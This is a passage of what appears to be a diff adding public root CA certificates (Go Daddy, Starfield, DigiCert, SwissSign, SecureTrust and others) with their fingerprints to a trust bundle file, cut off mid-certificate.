c3:84:6b:f2:4b:9e:93:ca:64:27:4c:0e:c6:7c:1e:cc:5e:02:4f:fc:ac:d2:d7:40:19:35:0e:81:fe:54:6a:e4 +-----BEGIN CERTIFICATE----- +MIIEADCCAuigAwIBAgIBADANBgkqhkiG9w0BAQUFADBjMQswCQYDVQQGEwJVUzEh +MB8GA1UEChMYVGhlIEdvIERhZGR5IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBE +YWRkeSBDbGFzcyAyIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTA0MDYyOTE3 +MDYyMFoXDTM0MDYyOTE3MDYyMFowYzELMAkGA1UEBhMCVVMxITAfBgNVBAoTGFRo +ZSBHbyBEYWRkeSBHcm91cCwgSW5jLjExMC8GA1UECxMoR28gRGFkZHkgQ2xhc3Mg +MiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCCASAwDQYJKoZIhvcNAQEBBQADggEN +ADCCAQgCggEBAN6d1+pXGEmhW+vXX0iG6r7d/+TvZxz0ZWizV3GgXne77ZtJ6XCA +PVYYYwhv2vLM0D9/AlQiVBDYsoHUwHU9S3/Hd8M+eKsaA7Ugay9qK7HFiH7Eux6w +wdhFJ2+qN1j3hybX2C32qRe3H3I2TqYXP2WYktsqbl2i/ojgC95/5Y0V4evLOtXi +EqITLdiOr18SPaAIBQi2XKVlOARFmR6jYGB0xUGlcmIbYsUfb18aQr4CUWWoriMY +avx4A6lNf4DD+qta/KFApMoZFv6yyO9ecw3ud72a9nmYvLEHZ6IVDd2gWMZEewo+ +YihfukEHU1jPEX44dMX4/7VpkI+EdOqXG68CAQOjgcAwgb0wHQYDVR0OBBYEFNLE +sNKR1EwRcbNhyz2h/t2oatTjMIGNBgNVHSMEgYUwgYKAFNLEsNKR1EwRcbNhyz2h +/t2oatTjoWekZTBjMQswCQYDVQQGEwJVUzEhMB8GA1UEChMYVGhlIEdvIERhZGR5 +IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBEYWRkeSBDbGFzcyAyIENlcnRpZmlj +YXRpb24gQXV0aG9yaXR5ggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD +ggEBADJL87LKPpH8EsahB4yOd6AzBhRckB4Y9wimPQoZ+YeAEW5p5JYXMP80kWNy +OO7MHAGjHZQopDH2esRU1/blMVgDoszOYtuURXO1v0XJJLXVggKtI3lpjbi2Tc7P +TMozI+gciKqdi0FuFskg5YmezTvacPd+mSYgFFQlq25zheabIZ0KbIIOqPjCDPoQ +HmyW74cNxA9hi63ugyuV+I6ShHI56yDqg+2DzZduCLzrTia2cyvk0/ZM/iZx4mER +dEr/VxqHD3VILs9RaRegAhJhldXRQLIQTO7ErBBDpqWeCtWVYpoNz4iCxTIM5Cuf +ReYNnyicsbkqWletNw+vHX/bvZ8= +-----END CERTIFICATE----- + +# Issuer: O=Starfield Technologies, Inc. OU=Starfield Class 2 Certification Authority +# Subject: O=Starfield Technologies, Inc. OU=Starfield Class 2 Certification Authority +# Label: "Starfield Class 2 CA" +# Serial: 0 +# MD5 Fingerprint: 32:4a:4b:bb:c8:63:69:9b:be:74:9a:c6:dd:1d:46:24 +# SHA1 Fingerprint: ad:7e:1c:28:b0:64:ef:8f:60:03:40:20:14:c3:d0:e3:37:0e:b5:8a +# SHA256 Fingerprint: 14:65:fa:20:53:97:b8:76:fa:a6:f0:a9:95:8e:55:90:e4:0f:cc:7f:aa:4f:b7:c2:c8:67:75:21:fb:5f:b6:58 +-----BEGIN CERTIFICATE----- +MIIEDzCCAvegAwIBAgIBADANBgkqhkiG9w0BAQUFADBoMQswCQYDVQQGEwJVUzEl +MCMGA1UEChMcU3RhcmZpZWxkIFRlY2hub2xvZ2llcywgSW5jLjEyMDAGA1UECxMp +U3RhcmZpZWxkIENsYXNzIDIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDQw +NjI5MTczOTE2WhcNMzQwNjI5MTczOTE2WjBoMQswCQYDVQQGEwJVUzElMCMGA1UE +ChMcU3RhcmZpZWxkIFRlY2hub2xvZ2llcywgSW5jLjEyMDAGA1UECxMpU3RhcmZp +ZWxkIENsYXNzIDIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwggEgMA0GCSqGSIb3 +DQEBAQUAA4IBDQAwggEIAoIBAQC3Msj+6XGmBIWtDBFk385N78gDGIc/oav7PKaf +8MOh2tTYbitTkPskpD6E8J7oX+zlJ0T1KKY/e97gKvDIr1MvnsoFAZMej2YcOadN ++lq2cwQlZut3f+dZxkqZJRRU6ybH838Z1TBwj6+wRir/resp7defqgSHo9T5iaU0 +X9tDkYI22WY8sbi5gv2cOj4QyDvvBmVmepsZGD3/cVE8MC5fvj13c7JdBmzDI1aa +K4UmkhynArPkPw2vCHmCuDY96pzTNbO8acr1zJ3o/WSNF4Azbl5KXZnJHoe0nRrA +1W4TNSNe35tfPe/W93bC6j67eA0cQmdrBNj41tpvi/JEoAGrAgEDo4HFMIHCMB0G +A1UdDgQWBBS/X7fRzt0fhvRbVazc1xDCDqmI5zCBkgYDVR0jBIGKMIGHgBS/X7fR +zt0fhvRbVazc1xDCDqmI56FspGowaDELMAkGA1UEBhMCVVMxJTAjBgNVBAoTHFN0 +YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xMjAwBgNVBAsTKVN0YXJmaWVsZCBD +bGFzcyAyIENlcnRpZmljYXRpb24gQXV0aG9yaXR5ggEAMAwGA1UdEwQFMAMBAf8w +DQYJKoZIhvcNAQEFBQADggEBAAWdP4id0ckaVaGsafPzWdqbAYcaT1epoXkJKtv3 +L7IezMdeatiDh6GX70k1PncGQVhiv45YuApnP+yz3SFmH8lU+nLMPUxA2IGvd56D +eruix/U0F47ZEUD0/CwqTRV/p2JdLiXTAAsgGh1o+Re49L2L7ShZ3U0WixeDyLJl +xy16paq8U4Zt3VekyvggQQto8PT7dL5WXXp59fkdheMtlb71cZBDzI0fmgAKhynp +VSJYACPq4xJDKVtHCN2MQWplBqjlIapBtJUhlbl90TSrE9atvNziPTnNvT51cKEY +WQPJIrSPnNVeKtelttQKbfi3QBFGmh95DmK/D5fs4C8fF5Q= +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert Assured ID Root CA O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert Assured ID Root CA O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert Assured ID Root CA" +# Serial: 17154717934120587862167794914071425081 +# MD5 Fingerprint: 87:ce:0b:7b:2a:0e:49:00:e1:58:71:9b:37:a8:93:72 +# SHA1 Fingerprint: 05:63:b8:63:0d:62:d7:5a:bb:c8:ab:1e:4b:df:b5:a8:99:b2:4d:43 +# SHA256 Fingerprint: 3e:90:99:b5:01:5e:8f:48:6c:00:bc:ea:9d:11:1e:e7:21:fa:ba:35:5a:89:bc:f1:df:69:56:1e:3d:c6:32:5c +-----BEGIN CERTIFICATE----- +MIIDtzCCAp+gAwIBAgIQDOfg5RfYRv6P5WD8G/AwOTANBgkqhkiG9w0BAQUFADBl +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv +b3QgQ0EwHhcNMDYxMTEwMDAwMDAwWhcNMzExMTEwMDAwMDAwWjBlMQswCQYDVQQG +EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl +cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwggEi +MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtDhXO5EOAXLGH87dg+XESpa7c +JpSIqvTO9SA5KFhgDPiA2qkVlTJhPLWxKISKityfCgyDF3qPkKyK53lTXDGEKvYP +mDI2dsze3Tyoou9q+yHyUmHfnyDXH+Kx2f4YZNISW1/5WBg1vEfNoTb5a3/UsDg+ +wRvDjDPZ2C8Y/igPs6eD1sNuRMBhNZYW/lmci3Zt1/GiSw0r/wty2p5g0I6QNcZ4 +VYcgoc/lbQrISXwxmDNsIumH0DJaoroTghHtORedmTpyoeb6pNnVFzF1roV9Iq4/ +AUaG9ih5yLHa5FcXxH4cDrC0kqZWs72yl+2qp/C3xag/lRbQ/6GW6whfGHdPAgMB +AAGjYzBhMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW +BBRF66Kv9JLLgjEtUYunpyGd823IDzAfBgNVHSMEGDAWgBRF66Kv9JLLgjEtUYun +pyGd823IDzANBgkqhkiG9w0BAQUFAAOCAQEAog683+Lt8ONyc3pklL/3cmbYMuRC +dWKuh+vy1dneVrOfzM4UKLkNl2BcEkxY5NM9g0lFWJc1aRqoR+pWxnmrEthngYTf +fwk8lOa4JiwgvT2zKIn3X/8i4peEH+ll74fg38FnSbNd67IJKusm7Xi+fT8r87cm +NW1fiQG2SVufAQWbqz0lwcy2f8Lxb4bG+mRo64EtlOtCt/qMHt1i8b5QZ7dsvfPx +H2sMNgcWfzd8qVttevESRmCD1ycEvkvOl77DZypoEd+A5wwzZr8TDRRu838fYxAe ++o0bJW1sj6W3YQGx0qMmoRBxna3iw/nDmVG3KwcIzi7mULKn+gpFL6Lw8g== +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert Global Root CA O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert Global Root CA O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert Global Root CA" +# Serial: 10944719598952040374951832963794454346 +# MD5 Fingerprint: 79:e4:a9:84:0d:7d:3a:96:d7:c0:4f:e2:43:4c:89:2e +# SHA1 Fingerprint: a8:98:5d:3a:65:e5:e5:c4:b2:d7:d6:6d:40:c6:dd:2f:b1:9c:54:36 +# SHA256 Fingerprint: 43:48:a0:e9:44:4c:78:cb:26:5e:05:8d:5e:89:44:b4:d8:4f:96:62:bd:26:db:25:7f:89:34:a4:43:c7:01:61 +-----BEGIN CERTIFICATE----- +MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD +QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT +MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j +b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG +9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB +CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97 +nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt +43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P +T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4 +gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO +BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR +TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw +DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr +hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg +06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF +PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls +YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk +CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4= +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert High Assurance EV Root CA O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert High Assurance EV Root CA O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert High Assurance EV Root CA" +# Serial: 3553400076410547919724730734378100087 +# MD5 Fingerprint: d4:74:de:57:5c:39:b2:d3:9c:85:83:c5:c0:65:49:8a +# SHA1 Fingerprint: 5f:b7:ee:06:33:e2:59:db:ad:0c:4c:9a:e6:d3:8f:1a:61:c7:dc:25 +# SHA256 Fingerprint: 74:31:e5:f4:c3:c1:ce:46:90:77:4f:0b:61:e0:54:40:88:3b:a9:a0:1e:d0:0b:a6:ab:d7:80:6e:d3:b1:18:cf +-----BEGIN CERTIFICATE----- +MIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j +ZSBFViBSb290IENBMB4XDTA2MTExMDAwMDAwMFoXDTMxMTExMDAwMDAwMFowbDEL +MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 +LmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug +RVYgUm9vdCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm ++9S75S0tMqbf5YE/yc0lSbZxKsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTW +PNt0OKRKzE0lgvdKpVMSOO7zSW1xkX5jtqumX8OkhPhPYlG++MXs2ziS4wblCJEM +xChBVfvLWokVfnHoNb9Ncgk9vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFB +Ik5lYYeBQVCmeVyJ3hlKV9Uu5l0cUyx+mM0aBhakaHPQNAQTXKFx01p8VdteZOE3 +hzBWBOURtCmAEvF5OYiiAhF8J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsg +EsxBu24LUTi4S8sCAwEAAaNjMGEwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQF +MAMBAf8wHQYDVR0OBBYEFLE+w2kD+L9HAdSYJhoIAu9jZCvDMB8GA1UdIwQYMBaA +FLE+w2kD+L9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUAA4IBAQAcGgaX3Nec +nzyIZgYIVyHbIUf4KmeqvxgydkAQV8GK83rZEWWONfqe/EW1ntlMMUu4kehDLI6z +eM7b41N5cdblIZQB2lWHmiRk9opmzN6cN82oNLFpmyPInngiK3BD41VHMWEZ71jF +hS9OMPagMRYjyOfiZRYzy78aG6A9+MpeizGLYAiJLQwGXFK3xPkKmNEVX58Svnw2 +Yzi9RKR/5CYrCsSXaQ3pjOLAEFe4yHYSkVXySGnYvCoCWw9E1CAx2/S6cCZdkGCe +vEsXCS+0yx5DaMkHJ8HSXPfqIbloEpw8nL+e/IBcm2PN7EeqJSdnoDfzAIJ9VNep ++OkuE6N36B9K +-----END CERTIFICATE----- + +# Issuer: CN=SwissSign Gold CA - G2 O=SwissSign AG +# Subject: CN=SwissSign Gold CA - G2 O=SwissSign AG +# Label: "SwissSign Gold CA - G2" +# Serial: 13492815561806991280 +# MD5 Fingerprint: 24:77:d9:a8:91:d1:3b:fa:88:2d:c2:ff:f8:cd:33:93 +# SHA1 Fingerprint: d8:c5:38:8a:b7:30:1b:1b:6e:d4:7a:e6:45:25:3a:6f:9f:1a:27:61 +# SHA256 Fingerprint: 62:dd:0b:e9:b9:f5:0a:16:3e:a0:f8:e7:5c:05:3b:1e:ca:57:ea:55:c8:68:8f:64:7c:68:81:f2:c8:35:7b:95 +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Issuer: CN=SwissSign Silver CA - G2 O=SwissSign AG +# Subject: CN=SwissSign Silver CA - G2 O=SwissSign AG +# Label: "SwissSign Silver CA - G2" +# Serial: 5700383053117599563 +# MD5 Fingerprint: e0:06:a1:c9:7d:cf:c9:fc:0d:c0:56:75:96:d8:62:13 +# SHA1 Fingerprint: 9b:aa:e5:9f:56:ee:21:cb:43:5a:be:25:93:df:a7:f0:40:d1:1d:cb +# SHA256 Fingerprint: be:6c:4d:a2:bb:b9:ba:59:b6:f3:93:97:68:37:42:46:c3:c0:05:99:3f:a9:8f:02:0d:1d:ed:be:d4:8a:81:d5 +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Issuer: CN=SecureTrust CA O=SecureTrust Corporation +# Subject: CN=SecureTrust CA O=SecureTrust Corporation +# Label: "SecureTrust CA" +# Serial: 17199774589125277788362757014266862032 +# MD5 Fingerprint: dc:32:c3:a7:6d:25:57:c7:68:09:9d:ea:2d:a9:a2:d1 +# SHA1 Fingerprint: 87:82:c6:c3:04:35:3b:cf:d2:96:92:d2:59:3e:7d:44:d9:34:ff:11 +# SHA256 Fingerprint: f1:c1:b5:0a:e5:a2:0d:d8:03:0e:c9:f6:bc:24:82:3d:d3:67:b5:25:57:59:b4:e7:1b:61:fc:e9:f7:37:5d:73 +-----BEGIN CERTIFICATE----- +MIIDuDCCAqCgAwIBAgIQDPCOXAgWpa1Cf/DrJxhZ0DANBgkqhkiG9w0BAQUFADBI +MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXU2VjdXJlVHJ1c3QgQ29ycG9yYXRpb24x +FzAVBgNVBAMTDlNlY3VyZVRydXN0IENBMB4XDTA2MTEwNzE5MzExOFoXDTI5MTIz +MTE5NDA1NVowSDELMAkGA1UEBhMCVVMxIDAeBgNVBAoTF1NlY3VyZVRydXN0IENv +cnBvcmF0aW9uMRcwFQYDVQQDEw5TZWN1cmVUcnVzdCBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAKukgeWVzfX2FI7CT8rU4niVWJxB4Q2ZQCQXOZEz +Zum+4YOvYlyJ0fwkW2Gz4BERQRwdbvC4u/jep4G6pkjGnx29vo6pQT64lO0pGtSO +0gMdA+9tDWccV9cGrcrI9f4Or2YlSASWC12juhbDCE/RRvgUXPLIXgGZbf2IzIao +wW8xQmxSPmjL8xk037uHGFaAJsTQ3MBv396gwpEWoGQRS0S8Hvbn+mPeZqx2pHGj +7DaUaHp3pLHnDi+BeuK1cobvomuL8A/b01k/unK8RCSc43Oz969XL0Imnal0ugBS +8kvNU3xHCzaFDmapCJcWNFfBZveA4+1wVMeT4C4oFVmHursCAwEAAaOBnTCBmjAT +BgkrBgEEAYI3FAIEBh4EAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB +/zAdBgNVHQ4EFgQUQjK2FvoE/f5dS3rD/fdMQB1aQ68wNAYDVR0fBC0wKzApoCeg +JYYjaHR0cDovL2NybC5zZWN1cmV0cnVzdC5jb20vU1RDQS5jcmwwEAYJKwYBBAGC +NxUBBAMCAQAwDQYJKoZIhvcNAQEFBQADggEBADDtT0rhWDpSclu1pqNlGKa7UTt3 +6Z3q059c4EVlew3KW+JwULKUBRSuSceNQQcSc5R+DCMh/bwQf2AQWnL1mA6s7Ll/ +3XpvXdMc9P+IBWlCqQVxyLesJugutIxq/3HcuLHfmbx8IVQr5Fiiu1cprp6poxkm +D5kuCLDv/WnPmRoJjeOnnyvJNjR7JLN4TJUXpAYmHrZkUjZfYGfZnMUFdAvnZyPS +CPyI6a6Lf+Ew9Dd+/cYy2i2eRDAwbO4H3tI0/NL/QPZL9GZGBlSm8jIKYyYwa5vR +3ItHuuG51WLQoqD0ZwV4KWMabwTW+MZMo5qxN7SN5ShLHZ4swrhovO0C7jE= +-----END CERTIFICATE----- + +# Issuer: CN=Secure Global CA O=SecureTrust Corporation +# Subject: CN=Secure Global CA O=SecureTrust Corporation +# Label: "Secure Global CA" +# Serial: 9751836167731051554232119481456978597 +# MD5 Fingerprint: cf:f4:27:0d:d4:ed:dc:65:16:49:6d:3d:da:bf:6e:de +# SHA1 Fingerprint: 3a:44:73:5a:e5:81:90:1f:24:86:61:46:1e:3b:9c:c4:5f:f5:3a:1b +# SHA256 Fingerprint: 42:00:f5:04:3a:c8:59:0e:bb:52:7d:20:9e:d1:50:30:29:fb:cb:d4:1c:a1:b5:06:ec:27:f1:5a:de:7d:ac:69 +-----BEGIN CERTIFICATE----- +MIIDvDCCAqSgAwIBAgIQB1YipOjUiolN9BPI8PjqpTANBgkqhkiG9w0BAQUFADBK +MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXU2VjdXJlVHJ1c3QgQ29ycG9yYXRpb24x +GTAXBgNVBAMTEFNlY3VyZSBHbG9iYWwgQ0EwHhcNMDYxMTA3MTk0MjI4WhcNMjkx +MjMxMTk1MjA2WjBKMQswCQYDVQQGEwJVUzEgMB4GA1UEChMXU2VjdXJlVHJ1c3Qg +Q29ycG9yYXRpb24xGTAXBgNVBAMTEFNlY3VyZSBHbG9iYWwgQ0EwggEiMA0GCSqG +SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCvNS7YrGxVaQZx5RNoJLNP2MwhR/jxYDiJ +iQPpvepeRlMJ3Fz1Wuj3RSoC6zFh1ykzTM7HfAo3fg+6MpjhHZevj8fcyTiW89sa +/FHtaMbQbqR8JNGuQsiWUGMu4P51/pinX0kuleM5M2SOHqRfkNJnPLLZ/kG5VacJ 